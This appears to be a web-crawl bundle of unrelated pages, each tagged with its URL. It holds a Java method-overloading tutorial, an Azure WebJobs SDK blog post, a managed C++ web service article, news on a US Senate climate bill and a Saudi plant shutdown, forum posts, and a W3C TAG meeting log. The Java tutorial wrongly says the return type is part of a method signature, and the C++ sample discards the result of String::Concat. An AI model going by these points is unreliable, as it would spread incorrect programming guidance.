Method Overloading Example section explains you how the method overloading is accomplished in Java. AdsTutorials In this section we will read about overloading in Java. Method overloading in Java is achieved due to the Java supports Polymorphism. Overloading of methods specifies the various methods defined with the same name. The concept of method overloading allows the Java programmer to use the method with the same name. But, these methods must be differentiated by their signature. Signature of method specifies the method's return type, number of arguments of method, data type of arguments of method. Constructors in Java is suitable example for understanding the concept of method overloading. Overloading allows the Java programmer to accomplish the compile time polymorphism. Method overloading allows the user to use the various implementations of same name and give the desired output. This feature protects to know about the internal processing system from the external users. Example Here we are giving a simple example which will demonstrate you about the method overloading in Java. In this example we will create a Java class where we will use the concept of method overloading. As we have discussed above constructor of a class is also uses the concept of method overloading so, in this example we will create the various constructors of a class. Then we will create methods with the same name but, with the different return types and number of parameters. MethodOverloading.java public class MethodOverloading { int a; int b; double c; double d; public MethodOverloading() { } public MethodOverloading(int a, int b) { this.a = a; this.b = b; } public void add() { int sum = a+b; System.out.println("Sum Of "+a+" and "+b+" = "+sum); } public int add(int num1, int num2) { return num1+num2; } public double add(double num1, double num2) { return num1+num2; } } MainClass.java public class MainClass { public static void main(String args[]) { int a = 6; int b = 4; double c = 4.5; double d = 5.5; MethodOverloading mo = new MethodOverloading(); MethodOverloading mo1 = new MethodOverloading(2, 4); mo1.add(); double sum1 = mo.add(c, d); System.out.println("Sum Of "+c+" and "+d+" = "+sum1); int sum2 = mo.add(a, b); System.out.println("Sum Of "+a+" and "+b+" = "+sum2); } } Output When you will execute the MainClass.java you will get the output as follows Advertisements Posted on: July 25, 2013 If you enjoyed this post then why not add us on Google+? Add us to your Circles Advertisements Ads Ads Discuss: Method Overloading Example In Java Post your Comment
https://www.roseindia.net/java/beginners/method-overloading-example-in-java.shtml
CC-MAIN-2017-43
en
refinedweb
We just published a new RTM release of the Azure WebJobs SDK packed with new features! This release opens a new extensibility model for the SDK which allows you to write custom triggers and binders for example, triggering functions based on file events, periodic schedules, etc. It leads to simplicity in developing and managing WebJobs, since you can now have a single WebJob with functions which can be triggered on Azure Queues, Blobs, Service Bus, Files, Timers, WebHooks – GitHub, Slack, Instagram, IFTTT and more. You can also set up alerts where you can send notification when a function fails. We’ve also added many new features and made many bug fixes based on your feedback. Features in this release This release is packed with many features around the new extensibility model for the SDK which allows you to write customer triggers and binders as well as core improvements to existing feature set. Following are some of the highlights in this release. Extensible model for writing your own and binders, and those extensions can be used by others in their applications. Redis.WebJob.Extensions is a project being built by Jason Haley which allows a user to trigger functions based on events in Redis. We created a new open source repo which contains extensions demonstrating the new extensibility model. Follow this detailed guide on the architecture of the extensibility model. There is a sample you can use to get started with to write your own trigger or binder. New triggers, binders and attributes This release include many new ways for the SDK to trigger functions. Some new ways of triggering functions are as follows: - Schedule based using TimerTrigger - File based events using FileTrigger - Ensure only a single instance of a particular function will run at any given time across multiple hosts using Singleton attribute - Allow a function to timeout or after a specified amount of time using Timeout attribute - Send emails on function completion using the new SendGrid binding - Trigger functions based on some error threshold (Raise an alert if there are more than 10 errors in the last 1 hr) using ErrorTrigger. - Trigger functions based on generic WebHook events using WebHookTrigger ( preview) The following snippet of code shows a WebJob which has functions which can be triggered on all these events. As you can see you can now have a single WebJob running with all these functions being triggered on different events. You can also leverage all the existing features of the SDK such as parameter binding, route matching and more. public class Functions { public static void ProcessTimer([TimerTrigger("*/15 * * * * *", RunOnStartup = true)] TimerInfo info, [Queue("queue")] out string message) { message = info.FormatNextOccurrences(1); } public static void ProcessQueueMessage([QueueTrigger("queue")] string message, TextWriter log) { log.WriteLine(message); } public static void ProcessFileAndUploadToBlob( [FileTrigger(@"import\{name}", "*.*", autoDelete: true)] Stream file, [Blob(@"processed/{name}", FileAccess.Write)] Stream output, string name, TextWriter log) { output = file; file.Close(); log.WriteLine(string.Format("Processed input file '{0}'!", name)); } [Singleton] public static void ProcessWebHookA([WebHookTrigger] string body, TextWriter log) { log.WriteLine(string.Format("WebHookA invoked! Body: {0}", body)); } public static void ProcessGitHubWebHook([WebHookTrigger] string body, TextWriter log) { dynamic issueEvent = JObject.Parse(body); log.WriteLine(string.Format("GitHub WebHook invoked! ('{0}', '{1}')", issueEvent.issue.title, issueEvent.action)); } public static void ErrorMonitor( [ErrorTrigger("00:01:00", 1)] TraceFilter filter, TextWriter log, [SendGrid( To = "[email protected]", Subject = "Error!")] SendGridMessage message) { // log last 5 detailed errors to the Dashboard log.WriteLine(filter.GetDetailedMessage(5)); message.Text = filter.GetDetailedMessage(1); } } New features in the Core SDK Apart from opening up the extensibility model and adding more triggers and binders, we also added many features to the Core SDK. Many of these were feature requests from the community so we are thrilled to complete these asks in this release. - More control over Queue processing: A user can have more control (JobHostQueuesConfiguration.NewBatchThreshold) over the concurrency settings of how many queue messages are de-queued. A user can also plug in their own QueueProcessor to customize how Queue messages are processed. - Extensible tracing and logging: In this release we provided extensibility points so you can plug in your own logger. - Error monitoring system: This feature allows you to monitor the Host or functions for any errors. You can also raise alerts and send notifications via email or text or plugin any other system such as IFTTT. - Multiple storage account support: You can now use multiple storage accounts in your WebJob functions. This allows you to perform scenarios such as reading a blob from one storage account and archiving it to another storage account. - Allows function timeouts to be specified: Based on user feedback (“Continuous Web Job frozen and preventing further QueueTriggers”), we added a Timeout attribute which allows functions to declaratively request function cancellation when a timeout expires. You can set this at the JobHost level. - Dynamically enable/disable functions: This allows you to disable functions from being triggered and can be controlled by a config switch which could be an app setting or environment name. - Added a CloudBlobDirectory binding for blobs. - IEnumerable binder for blobs: You can now bind to a collection of blobs (IEnumerable, IEnumerable, CloudBlobContainer, etc.). - Control/customize the Azure Storage SDK clients used by the WebJobs SDK: Added JobHostConfiguration.StorageClientFactory to specify/set advanced options on CloudQueueClient/CloudBlobClient/CloudTableClient, etc. ServiceBus enhancements(); } } Enhancements include: - Allow deep customization of Message processing via ServiceBusConfiguration.MessagingProvider - MessagingProvider supports customization of the ServiceBus MessagingFactory and NamespaceManager - A new MessageProcessor strategy pattern allows you to specify a processor per queue/topic - Support message processing concurrency by default (previously there was no concurrency) - Easy customization of OnMessageOptions via ServiceBusConfiguration.MessageOptions - Allow AccessRights to be specified on ServiceBusTriggerAttribute/ServiceBusAttribute (for scenarios where you might not have Manage rights) Dashboard for monitoring You can continue to use the dashboard to monitor all functions triggered based on various events. You get all the same benefits of the dashboard as before such as: real time monitoring, real time I/O, replay a function, abort a function etc. The following image shows the Functions view of the dashboard for this specific WebJob. Download this release You can download the WebJobs SDK from the NuGet gallery and can install these packages from the NuGet gallery using the NuGet Package Manager Console, like this: - Install-Package Microsoft.Azure.WebJobs If you want to use Microsoft Azure Service Bus, install the following package: - Install-Package Microsoft.Azure.WebJobs.ServiceBus There is a new package which has some new triggers (Timer, File etc.) and binders built on the new extensibility model. - Install-Package Microsoft.Azure.WebJobs.Extensions There is a new package where you can send emails using SendGrid service. You can use this to raise email notification for different errors such as function failure and more. - Install-Package Microsoft.Azure.WebJobs.Extensions.SendGrid This is a new package which allows the SDK to trigger functions based on WebHook events. This package is currently still in preview. - Install-Package Microsoft.Azure.WebJobs.Extensions.WebHooks Open source The source code for the SDK, extensibility system and related repos are available here: Please open issues for any feedback and send PR’s for issues you want to fix. Samples - You can find samples on how to use triggers and binders for blobs, tables, queues, timers, files, WebHooks, Service Bus and more. - - Guidelines for authoring new triggers and binders - Azure WebJobs Update with Pranav Rastogi - Channel 9 video on Making Your Jobs Easier With Windows Azure WebJobs SDK - Introduction to WebJobs and SDK by Scott Hanselman - Azure WebJobs – Recommended Resources - WebJobs video series on Azure Friday - Video series by Magnus Martensson - Tutorial: Getting started with Microsoft Azure WebJobs SDK Give feedback and get help If you have questions, please ask them on the Azure forum, the ASP.NET forum, or StackOverflow.com (tag name #Azure-WebJobsSDK). Summary This release of the SDK opens up a whole new world of triggers and binders enabling extension authors to write triggers for any event type they choose. Examples include File events, Timer/Cron schedule events, SQL events, Redis pub/sub events, etc. (check out our links to further documentation and samples below). receiving your feedback around the extensibility model. Thank You! Azure WebJobs team Find us on Twitter for the latest updates and use #AzureWebJobs.
https://azure.microsoft.com/de-de/blog/azure-webjobs-sdk-1-1-0-rtm/
CC-MAIN-2017-43
en
refinedweb
This article assumes you are familiar with declaring and using managed types and the .NET Garbage Collector. Creating your first web service is incredibly easy if you use C# or VB.NET (see my previous article for details). Writing a WebService using managed C++ in .NET is also extremely simple, but there are a couple of 'gotcha's that can cause a few frustrating moments. My first suggestion is to use the Visual Studio .NET Wizards to create your WebService (in fact it's a great idea for all your apps when you are first starting out). This is especially important if you are moving up through the various builds of the beta bits of .NET. What is perfectly acceptable in one build may fail to compile in another build, and it may be difficult to work out which piece of the puzzle you are missing. Using the Wizards can get you a managed C++ WebService up and running in minutes, but things can start to get a little weird as soon as you try something a little more risqué. For this example I have created a service called MyCPPService by using the Wizard. Simply select File | New Project and run through the wizard to create a C++ WebService. MyCPPService A new namespace will be defined called CPPWebService, and within this namespace will be the classes and structures that implement your webservice. For this example I have called the class MyService. Other files that are created by the wizard include the .asmx file that acts as a proxy for your service; the config.web file for configuration settings, and the .disco file for service discovery. Once you compile the class your assembly will be stored as CPPWebService.dll in the /bin directory. CPPWebService MyService I wanted to mimic the C# WebService created in my previous article, but with a few minor changes to illustrate using value and reference types. With this in mind I defined a Value Type structure ClientData and a managed reference type ClientInfo within the namespace that would both contain a name and an ID (string and int values respectively). ClientData ClientInfo string int __value public struct ClientData { String *Name; int ID; }; __gc public class ClientInfo { String *Name; int ID; }; In order to return an array of objects a quick typedef is also declared typedef ClientData ClientArray[]; In a similar fashion I defined my MyService class as a simple managed C++ class with three methods: MyMethod is a simple method that GetClientData GetClientsData ClientInfo // CPPWebService.h #pragma once #using "System.EnterpriseServices.dll" namespace CPPWebService { __value public struct ClientData { String *Name; int ID; }; __gc public class ClientInfo { String *Name; int ID; }; typedef ClientData ClientArray[]; __gc class MyService { public: [WebMethod] int MyMethod(); [WebMethod] ClientData GetClientData(); [WebMethod] ClientArray GetClientsData(int Number); }; } The important thing to notice about the function prototypes is the [WebMethod] attribute - this informs the compiler that the method will be a method of a web service, and that it should provide the appropriate support and plumbing. The method you attach this attribute to must also be publicly accessible. [WebMethod] The implementation (.cpp) file is as follows. #include "stdafx.h" #using <mscorlib.dll> #using "System.Web.dll" #using "System.Web.Services.dll" using namespace System; using namespace System::Web; using namespace System::Web::Services; #include "CPPWebService.h" namespace CPPWebService { int MyService::MyMethod() { return 42; } ClientData MyService::GetClientData() { ClientData data; data.Name = new String("Client Name"); data.ID = 1; return data; } ClientArray MyService::GetClientsData(int Number) { // simple sanity checks if (Number < 0 || Number > 10) return 0; ClientArray data = new ClientData __gc[Number]; if (Number > 0 && Number <= 10) { for (int i = 0; i < Number; i++) { data[i].Name = new String("Client "); data[i].Name->Concat(i.ToString()); data[i].ID = i; } } return data; } }; Note the use of the syntax i.ToString(). In .NET, value types such as int's and enums can have methods associated with them. i.ToString() simply calls the Int32::ToString() for the variable i. i.ToString() Int32::ToString() One huge improvement of .NET beta 2 over beta 1 is that you no longer need to mess around with the XmlIncludeAttribute class to inform the serializer about your structure. A few bugs that either caused things to misbehave, or worse - not run altogether - have also been fixed. Writing a WebService in MC++ is now just as easy in C++ as it is in C#, with the advantage that you can mix and match native and managed code while retaining the raw power of C++. XmlIncludeAttribute Once you have the changes in place you can build the project then test the service by right clicking on the CPPWebService.asmx in the Solution Explorer in Visual Studio and choosing "View in Browser". The test page is shown below. Clicking on one of the methods (say, GetClientsData) results in a proxy page being presented which allows you to invoke the method directly from your browser. The GetClientsData method takes a single int parameter which you can enter in the edit box. int When invoked this returns the following: Writing WebServices using Visual C++ with managed extensions is just as easy as writing them using C# or VB.NET, as long as you remember a few simple things: use attributes, declare your classes as managed and make them publicly accessible. Using the Visual Studio.NET wizards makes writing and deploying these services a point and click affair, but even if you wish to do it by hand then the steps involved are extremely simple. Oct 18 - updated for .NET beta 2 This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) struct MatchingPatientData<br /> {<br /> BSTR PatientId;<br /> BSTR FirstName;<br /> BSTR LastName;<br /> }; HRESULT QueryPatientsSimple<br /> (<br /> MatchingPatientData** QueryPatientsSimpleResult, <br /> int* QueryPatientsSimpleResult_nSizeIs<br /> ); General News Suggestion Question Bug Answer Joke Praise Rant Admin Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
https://www.codeproject.com/Articles/1043/Your-first-managed-C-Web-Service?msg=1014467
CC-MAIN-2017-43
en
refinedweb
04 March 2010 16:08 [Source: ICIS news] By Joe Kamalick WASHINGTON (ICIS news)--A new, more moderate plan for a climate bill is soon to be set afloat in the US Senate, but the still tentative effort seemingly has already run aground on the hard rocks of coal. Senators John Kerry (Democrat-Massachusetts), Lindsey Graham (Republican-South Carolina) and Joe Lieberman (Independent-Connecticut) are said to be close to issuing a working paper for a new climate bill, although not a formal piece of legislation. While details are not yet available, the new climate bill’s key feature is said to be a gradual industry-by-industry sequence to reducing greenhouse gases - a go-slow approach that will abandon any sort of economy-wide cap-and-trade mandate. The three senators’ effort is said to be designed to avoid the controversial central element of earlier climate change bills - a federal mandate to cap current greenhouse gas (GHG) emissions throughout the economy and gradually reduce them through an emissions permit trading system. Their measure, say sources, would call for aggressive reductions in US emissions of greenhouse gases but would offer a measured and slower approach, perhaps beginning with electric utilities and then gradually moving on to encompass other sectors, such as manufacturing, mining, transportation and agriculture. In each successive segment of the economy, entities that emit greenhouse gases would be given flexibility and time to reach targeted emissions cuts. Electric utilities likely would be the first-at-bat industry, and that critical sector would be allowed generous compliance terms to ease the transition to less carbon-intensive operations. But barely had word of the three senators’ “pre-bill” circulated on Capitol Hill when it came under perhaps fatal fire from 13 Democrat senators vehemently opposed to any special favours for utilities and their carbon-rich ways. In a letter to Senate Majority Leader Harry Reid (Democrat-Nevada) and pointedly copied to Kerry, Graham and Lieberman, the group of 13 warned that they oppose any climate bill that would exempt utilities from strict emissions cuts. Led by New Jersey Democrat Robert Menendez, the 13 senators demanded that Reid “ensure that energy and climate legislation builds on the existing Clear Air Act and does not create loopholes for old, inefficient and polluting coal-fired power plants”. “The bill should require coal-fired power plants - old and new alike - to meet up-to-date performance standards for carbon dioxide that will complement an overall cap on emissions and move ?xml:namespace> “Coal-fired power plants are the nation’s larges source of global warming pollution,” the 13 senators said in a note accompanying the letter to Reid. “The Clean Air Act requires that power plants - as well as factories, refineries and other big sources of pollution - meet source-specific performance standards,” the note said, adding: “In the landmark 2007 decision in The 13 Democrat senators - who in addition to Menendez include Barbara Boxer of California, Chris Dodd of Connecticut, Frank Lautenberg of New Jersey and Jeff Merkley and Ron Wyden, both of Oregon - were sharply critical of the massive climate bill passed by the US House last year because that narrowly approved measure granted major exemptions or compliance allowances for coal-fired utilities. However, any climate legislation that would hold coal-fired utilities to an immediate and strict carbon emissions standard would lose the support of senators that otherwise might support a sharp cut in greenhouse gases.. To Frank Maisano, a long-time energy policy analyst and senior principal at the Washington, DC, law firm of Bracewell & Giuliani, the letter from Menendez and 12 other Senate Democrats is a perfect illustration of how difficult - and likely impossible - it will be for Congress to pass a climate bill in this election year. “When you push a piece into a bill that will pick up a couple of more votes on one side, it pushes votes out on the other side,” he said in reference to the Menendez letter. “Every time someone says something to make a climate bill more moderate, it raises objections from the others side. It is a political formula that never adds up.” Maisano also noted that the If the emissions mandate is not economy-wide and focuses first on utilities, then their support is gone, he said. “There’s not going to be climate legislation this year,” Maisano said. “Of course that’s not 100% certain,” he added, “nothing ever is - but I don’t see any widespread cap-and-trade legislation for this year. There’s simply not the votes for it.” “It’s just a house of cards,” another Hill watcher said of climate legislation. “Every time someone tries to add a card or take one out, it all falls apart.”
http://www.icis.com/Articles/2010/03/04/9339347/insight-new-us-senate-climate-bid-founders-on-coal.html
CC-MAIN-2015-06
en
refinedweb
13 January 2012 02:42 [Source: ICIS news] SINGAPORE (ICIS)--?xml:namespace> “The shutdown will take place in April or within the second quarter,” he said. Both IAC, as well as the adjoining International Vinyl Acetate Company (IVC) vinyl acetate monomer (VAM) plant which has an annual nameplate capacity of 330,000 tonnes, are currently operating at full capacity, he said. The IVC VAM plant is not due for any turnarounds this year, he added. IAC and IVC are joint ventures between Saudi International Petrochemical Company (Sipchem) and Helm. Half of the output from the acetic acid plant is utilised in the production of VAM. The remaining acetic acid is sold on local and international markets. Major acetic acid producers in Asia include US-based Please visit the complete ICIS plants and projects database For more information
http://www.icis.com/Articles/2012/01/13/9523424/iac-saudi-acetic-acid-plant-to-shut-for-maintenance.html
CC-MAIN-2015-06
en
refinedweb
categorized question QandAEditors I have a string, and I want to find which one of the following 3 characters come first (ie, is on the left-most side of a given string) ? <p> for example: <code> qwert(ui)" should return ( qwerty"(ff) should return " qwer)()(" should return ) </code> and so on. <p> THX 1826 2
http://www.perlmonks.org/index.pl?displaytype=xml;node_id=37089
CC-MAIN-2015-06
en
refinedweb
help with "rolling my own" Timer class - From: Alfonso Morra <sweet-science@xxxxxxxxxxxx> - Date: Mon, 18 Jul 2005 23:20:18 +0000 (UTC) Hi, I am writing a timer class that I want to be able to get to notify me (via a callback func), when a specified interval has elapsed. I have most of the timer functionality figured - however, I need to spawn a new thread to carry out the "time watch" - and I need to do this in a cross platform (Well Linux/Windows) way ... Any help will be much appreciated. The code (snippet) follows below: #include <ctime> typedef void (*TIMER_CB_FUNC)( void ) ; class Timer { public: inline Timer():m_cbfunc(0),m_interval(0),m_stime(0){} ; Timer( TIMER_CB_FUNC, unsigned short) ; Timer( const Timer&) ; Timer& operator= (const Timer& ) ; virtual ~Timer() ; //not really required private: TIMER_CB_FUNC m_cbfunc ; unsigned short m_interval ; time_t m_stime ; /* private functions */ void reset( void ); }; Basically when the Timer class is constructed, it must start a new thread that waits till the time is up and then notifies me. MTIA . - Follow-Ups: - Re: help with "rolling my own" Timer class - From: William DePalo [MVP VC++] - Prev by Date: Support link missing for C++.NET 2003 ? - Next by Date: Re: Support link missing for C++.NET 2003 ? - Previous by thread: Support link missing for C++.NET 2003 ? - Next by thread: Re: help with "rolling my own" Timer class - Index(es):
http://www.tech-archive.net/Archive/DotNet/microsoft.public.dotnet.languages.vc/2005-07/msg00425.html
CC-MAIN-2015-06
en
refinedweb
IRC log of tagmem on 2011-02-10 Timestamps are in UTC. 13:45:48 [RRSAgent] RRSAgent has joined #tagmem 13:45:48 [RRSAgent] logging to 13:45:57 [ht] Meeting: TAG Face-to-Face 13:46:03 [ht] Chair: Noah Mendelsohn 13:46:23 [ht] Agenda: 13:46:28 [ht] Scribe: Henry S. Thompson 13:46:33 [ht] Scribenick: ht 13:46:34 [plinss] plinss has joined #tagmem 13:57:44 [noah] noah has joined #tagmem 14:01:09 [masinter] masinter has joined #tagmem 14:05:27 [TimblPhone] TimblPhone has joined #tagmem 14:05:50 [TimblPhone] Sorry late 14:08:09 [DKA] DKA has joined #tagmem 14:10:39 [ht] Topic: Review of Agenda 14:10:50 [ht] NM: 14:13:24 [ht] NM: Action item review is just checking that we've got the right things on the schedule in the near term 14:14:02 [ht] NM: Open issue review is quite different, intended to check that we haven't let things fall between the cracks, or that we are carrying things we don't need to 14:14:22 [ht] Topic: TAG Priorities for 2011 14:14:37 [ht] NM: 14:15:02 [ht] NM: Good for us to review each year where our effort is going, and how we are going to get it done 14:15:14 [ht] ... and be sure we have a shared notion of our priorities 14:15:29 [DKA] q+ to suggest we take a look at w3c priorities : 14:15:45 [ht] NM: I'd like to get more than one person on the hook for at least some tasks, to share the work back and forth in some way 14:16:40 [TimblPhone] TimblPhone has joined #tagmem 14:16:43 [ht] NM: Looking back, we set outselves some priorities: Tracking/influencing the HTML work -- hard situation, but we did a number of things here and I think we did what we set to do 14:16:48 [timbl] timbl has joined #tagmem 14:17:52 [ht] NM: We also committed to a Web App Arch effort, since two years, but I don't feel that we've made as much progress here as I'd hoped -- we need to look hard at this to see whether we should modify or even drop our goal 14:18:22 [Ashok] Ashok has joined #tagmem 14:18:25 [ht] NM: Third goal was Metadata, an umbrella for many SemWeb issues 14:18:49 [ht] JR, LM: No, Metadata is much narrower than that, it is about documents only 14:19:03 [ht] TBL: +1 to keeping Metadata narrowly focussed 14:19:50 [ht] NM: We've also done good work, largely due to LM's efforts, on a number of core web infrastructure issues, including IRIs and media types 14:20:00 [ht] LM: I'm actually concerned IRIs are stalled 14:20:15 [noah] 14:20:46 [noah] 14:21:04 [ht] NM: On the organizational front, we're trying to structure the management of our work via Tracker Products 14:21:15 [masinter] s/IRIs are stalled/how little progress on IRIs lately/ 14:21:15 [ht] For example, 14:22:24 [ht] NM: Tracker has Issues, Actions and Products 14:22:44 [ht] ... Actions can be associated with Issues or Products 14:23:50 [ht] NM: See the Guide to TAG procedures [URI] 14:24:28 [timbl] nm: Tracker is just not flexible enough to be able to connect issues and products 14:24:33 [ht] NM: Please note that there are two 'Product' pages, one under 2001/tag/products and one under Tracker 14:24:52 [ht] [Discussion about mechanism, not minuted] 14:26:10 [timbl] nm: Need properties fo a product: Goals, scuuess criteria, deliverables with dates, schedules, TAG members assigned, related issues. 14:26:33 [ht] NM: Intent is to have a small number of Products 14:26:39 [Norm] Norm has joined #tagmem 14:26:54 [timbl] We could do it in RTDF if we had a RDF export from Tracker of course 14:27:11 [ht] NM: API Minimization is our first example: 14:28:03 [Norm] Norm has joined #tagmem 14:28:05 [ht] NM: Goals and Success criteria are the core of these 14:28:37 [ht] ... Made concrete by deliverables 14:30:07 [ht] NM: Example Action: ACTION-514 14:30:15 [ht] tracker, ACTION-514 14:30:24 [ht] trackbot, ACTION-514 14:30:24 [trackbot] Sorry, ht, I don't understand 'trackbot, ACTION-514'. Please refer to for help 14:30:51 [ht] LM: I think maybe we need two categories of Products 14:31:08 [ht] ... 1) Specific documents or other outputs' 14:31:09 [timbl] q+ 14:31:12 [ht] s/'/;/ 14:31:47 [ht] LM: 2) Things which are more like some of our Issues, e.g. Track the HTML work 14:32:02 [ht] NM: Yes, but can we just try your case (1) for now 14:33:21 [ht] TBL: Mechanisms are your business as chair, the focus is on the content, that's where our energy should go 14:34:17 [ht] TBL: But, having said that, my inner hacker has already built an ontology for issue/product/... management for the Tabulator 14:34:33 [ht] ... I could do more hacking and give you everything you want 14:34:47 [ht] TBL: In practice lets go ahead as you propose 14:35:12 [ht] ... But in the background, maybe you and I should try to do something better 14:35:23 [ht] Tutti: Crack on 14:36:09 [masinter] q+ 14:36:10 [ht] NM: Regardless of mechanism, do we agree to focus our effort management on setting goals and success criteria, with dated deliverables 14:36:32 [ht] q+ to cavill wrt education/oversight kinds of activities 14:36:38 [ht] ack masinter 14:36:45 [jar] jar has joined #tagmem 14:36:56 [jar] It would be nice if (1) product name could be changed (2) products can be classified somehow (active, complete, etc) (3) notes could be added to product pages 14:37:18 [ht] LM: We do other things -- coordination with the IETF 14:37:26 [masinter] want to track the larger theme of W3C/IETF coordination at architectural level 14:37:26 [ht] LM: This is a larger theme 14:37:59 [ht] NM: For me that's an Issue, about how to coordinate with other bodies 14:38:25 [ht] LM: It's not a management issue, it's a technical issue -- what is the relationship of Web Arch to Internet Arch 14:38:54 [ht] LM: What's critical for a Product is Success criteria 14:39:47 [ht] ... And I think we _can_ identify and evaluate progress for this effort, so it can be a Product 14:40:18 [masinter] q- 14:40:22 [ht] NM: Other things can have ways to identify and evaluate progress, I want to keep Products for things with deliverables 14:40:44 [ht] ack DKA 14:40:44 [Zakim] DKA, you wanted to suggest we take a look at w3c priorities : 14:40:47 [noah] q? 14:41:10 [timbl] q- 14:41:13 [timbl] <-- the high-level concept of task 14:41:27 [ht] DKA: Wrt TAG priorities, there's also the W3C 2011 Priorities and Milestones document 14:41:57 [ht] DKA: 14:42:22 [ht] NM: This reminds me that there are two ways to come at our planning: internally-driven and externally-driven 14:42:38 [ht] DKA: In particular, are we missing anything from Jeff Jaffe's list? 14:42:57 [ht] NM: So take a tentative pass at what we are already spending time on 14:43:08 [ht] ... and then see if there's anything we're missing 14:43:29 [ht] ... at which point we will know if we're overcommitted 14:44:15 [ht] LM: It's great to see a W3C priority list of technical topics 14:44:22 [ht] ... I'd like to respond to it 14:44:47 [ht] ... So this is higher priority for me than reviewing our current / past efforts 14:46:02 [ht] HST: The chair is asking for help in getting to that, by first clarifying the status of our existing commitments 14:46:31 [ht] q- ht 14:46:35 [masinter] q? 14:46:54 [ht] NM: Here's another Product: HTML/XML Unification 14:47:38 [ht]??? 14:48:43 [masinter] I think the "big theme" here is: architectural coherence of the W3C protocol and format work 14:48:45 [ht] TBL: Wrt Success criteria, include documentation of important properties of the system which need to be preserved 14:49:14 [masinter] And that XML / HTML is a lead element, because so much of W3C work is based on XML and yet HTML consistency with it is at issue 14:49:32 [masinter] and that the TAG could look at whatever the "task force" produces in this context 14:49:53 [masinter] the goal should not be "Unification" but "coherence" and "support for workflows and use cases" 14:50:33 [masinter] and there are various sub-products, around IRIs and URI schemes.... 14:50:46 [noah] ACTION: Noah to build Tracker product page for HTML/XML Unification 14:50:47 [trackbot] Created ACTION-522 - Build Tracker product page for HTML/XML Unification [on Noah Mendelsohn - due 2011-02-17]. 14:51:04 [ht] LM: The big theme here is architectural coherence between W3C RECs 14:51:53 [ht] LM: I wouldn't want to track this as Unification, because that's not the goal even for XML vs. HTML 14:52:02 [ht] ... I don't think that goal stands up 14:52:37 [ht] NM: I hear you as observing that there's a higher theme that this specific Product fits into 14:52:57 [ht] and I think we can do that, we can have Themes 14:53:06 [ht] s/and/NM: and/ 14:53:38 [ht] NM: The name comes from the history -- is the key point the abstraction of a higher level 14:53:55 [ht] LM: Either this fits in one of the high-level things the JJ laid out, or something else 14:54:11 [ht] ... in this case, something else, which is a particular TAG responsibility 14:54:59 [ht] NM: I hear this, and will try to find a way to organise our thinking at this level 14:55:08 [ht] LM: Pass for now 14:58:51 [ht] HST: [proposed minor agenda restructuring] 14:59:21 [ht] Topic: Client-side Storage 14:59:34 [ht] ISSUE-60 14:59:42 [ht] trackbot, ISSUE-60 14:59:42 [trackbot] Sorry, ht, I don't understand 'trackbot, ISSUE-60'. Please refer to for help 14:59:49 [ht] trackbot, ISSUE 60 14:59:49 [trackbot] Sorry, ht, I don't understand 'trackbot, ISSUE 60'. Please refer to for help 15:00:24 [ht] AM: speaks to 15:00:26 [masinter] masinter has joined #tagmem 15:00:47 [ht] AM: I need guidance on how to take this forward 15:02:29 [masinter] This underlying architectural issue relates to "Powerful Web Apps", "Data and Service Integration" and "Web of Trust": web applications are more powerful if different applications can share. But they have to do it in a secure way that also maintains user privacy. 15:03:07 [ht] AM: The fundamental issue is how to manage the inevitable intrusion of the Privacy/Security issue into any discussion of client-side storage: 15:03:11 [timbl] q+ 15:03:27 [ht] AM: 1) Ignore it, and just do the storage thing; 15:03:44 [ht] AM: 2) Try to do the integration. 15:03:47 [noah] q? 15:03:47 [jar] q? 15:03:47 [masinter] topic? 15:04:41 [ht] AM: The answer is different depending on whether we see the deliverable here as stand-alone, or as part of a larger document where Security is being taken care of 15:04:57 [timbl] q+ to point out that there is now a large and increasing amount of technology making cookies the tip of the iceberg, and that the issue of which websites can acecss what cookies generalzies to which websites, pcrincipals, and code modules, 15:05:00 [noah] ack next 15:05:01 [Zakim] timbl, you wanted to point out that there is now a large and increasing amount of technology making cookies the tip of the iceberg, and that the issue of which websites can acecss 15:05:06 [Zakim] ... what cookies generalzies to which websites, pcrincipals, and code modules, 15:05:24 [jar] q+ jar to mumble about multiple requirements -> solution with multiple facets 15:05:53 [ht] TBL: The document talks mostly about cookies, but there are a large number of new technologies, e.g. sqllib, which are at least as important going forward 15:06:13 [masinter] Security sections could move to 15:06:29 [ht] TBL: And as you talk about privacy in that context, it becomes a question about what 'agent' (software, site, person) can get access to what 15:06:56 [ht] AM: You're going beyond data 15:07:04 [masinter] based on 15:07:53 [masinter] q? 15:07:55 [masinter] q+ 15:08:03 [ht] TBL: No, just data raises these issues, say I have an rdf store on my phone, and an app written by an airline is running in a container from a third party and wants access to that data. . . 15:08:21 [noah] q+ to briefly respond to Tim 15:08:37 [ht] ... At worst we end up all having to have our own copies of all the privacy-implicated software, to ensure our data doesn't get away 15:08:57 [noah] ack next 15:08:58 [Zakim] jar, you wanted to mumble about multiple requirements -> solution with multiple facets 15:09:15 [ht] TBL: So this discussion has to be forward-looking to address not just what's here now, but what's coming soon 15:09:55 [masinter] "In 2011, W3C expects to charter a Web Application Security Working Group for work on specific technologies to enable more robust and secure Web Applications." from 15:10:01 [ht] JAR: Normal engineering practice should be followed, to look first at the requirements, without jumping to soon to the technology (e.g. cookies) 15:10:24 [ht] ... You started out with "need....", which are requirements, and then jump to security -- but that's a requirement too 15:11:05 [ht] JAR: It's like building a LISP interpreter, if you leave memory management to the end, you end up with a buggy implementation 15:11:08 [masinter] q? 15:11:17 [ht] AM: Right, so you're saying add security as a requirement, early 15:11:31 [ht] JAR: Only then do you look at solutions 15:11:40 [noah] ack next 15:11:48 [ht] ... and try to match requirements to aspects of solutions 15:12:10 [masinter] under "Privacy and Security" 15:12:43 [ht] LM: There is a commitment at W3C level to charter a Privacy and Security Wg 15:12:50 [noah] Actually, the slide just said privacy, and I think that's what I heard him ask about. That's why I got confused when we kept talking about security. 15:13:15 [ht] LM: And that group is a candidate recipient for this work 15:13:32 [ht] AM: I thought it was a Privacy IG that was on the way 15:13:40 [ht] ... and that's not quite the same 15:14:41 [ht] LM: W3C has commited to chartering an Web Applications Security WG 15:15:04 [ht] ... In JJ's document 15:15:22 [ht] s/an Web/a Web/ 15:15:29 [noah] From: 15:15:48 [noah] In 2011, W3C expects to charter a Web Application Security Working Group for work on specific technologies to enable more robust and secure Web Applications. 15:15:53 [noah] (public document) 15:15:54 [noah] q? 15:15:57 [noah] ack next 15:15:59 [Zakim] noah, you wanted to briefly respond to Tim 15:16:04 [ht] AM: So, yes, when that happens, feeding in to it 